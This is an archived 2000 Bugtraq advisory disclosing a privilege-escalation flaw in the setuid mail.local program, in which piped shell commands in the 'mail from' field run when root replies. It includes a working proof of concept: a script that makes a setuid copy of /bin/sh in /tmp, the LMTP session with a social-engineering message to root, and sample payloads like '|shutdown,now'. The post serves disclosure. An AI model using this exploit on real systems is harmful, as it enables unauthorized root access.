Home page logo

bugtraq logo Bugtraq mailing list archives

vulnerability in mail.local
From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Wed, 1 Nov 2000 18:57:10 GMT


mail.local is a little setuid root prog designed, like its name suggest, for
local mail delivering.
Used with the -l option, we have an interactive mode in lmtp protocol (
simplified smtp for local mail delivery only )
A weakness exists in the 'mail from' field that allow any local user to
insert a piped shell command that may be executed
by the recipient when he does a reply with the  mail command. A little
social engineering skill should help to root the boxe.
Finally, mail.local shouldn't allow such escape chars even in the mail from
field and the command mail shouldn't allow such
a reply through a pipe.

A space char in the command will finish the string, so either u use a single
command like '|reboot' or use a comma that should
be converted in space by mail.
eg: '|shutdown,now'

Linux 2.4.0 beta Caldera that was freely distributed during the defcon 00 is
vulnerable to this pb.

That looks like the old sendmail bugs


#cat exploit

cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh

#id=666(c3rb3r) gid=100(user)
#cp exploit /tmp/@hotmail.com
#chmod a+x /tmp/@hotmail.com
#mail.local -l


mail from:<|/tmp/@hotmail.com>      U can use many senders to hide the evil
rcpt to:<root>
Subject:I have a problem

I need higher priviledge on this machine, can u do something for me please ?


(now wait for a reply and then, )

#ls /tmp

#id=0(root) gid=0(root)
#echo 'very nice, thanx a lot'  | mail -s 'thanx' root    // With

Have a nice day,

Gregory Duchemin
Security consultant

1001 bd Maisonneuve Ouest, suite 200
Montreal (Quebec) H3A 3C8 CANADA
c3rb3r () hotmail com

Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]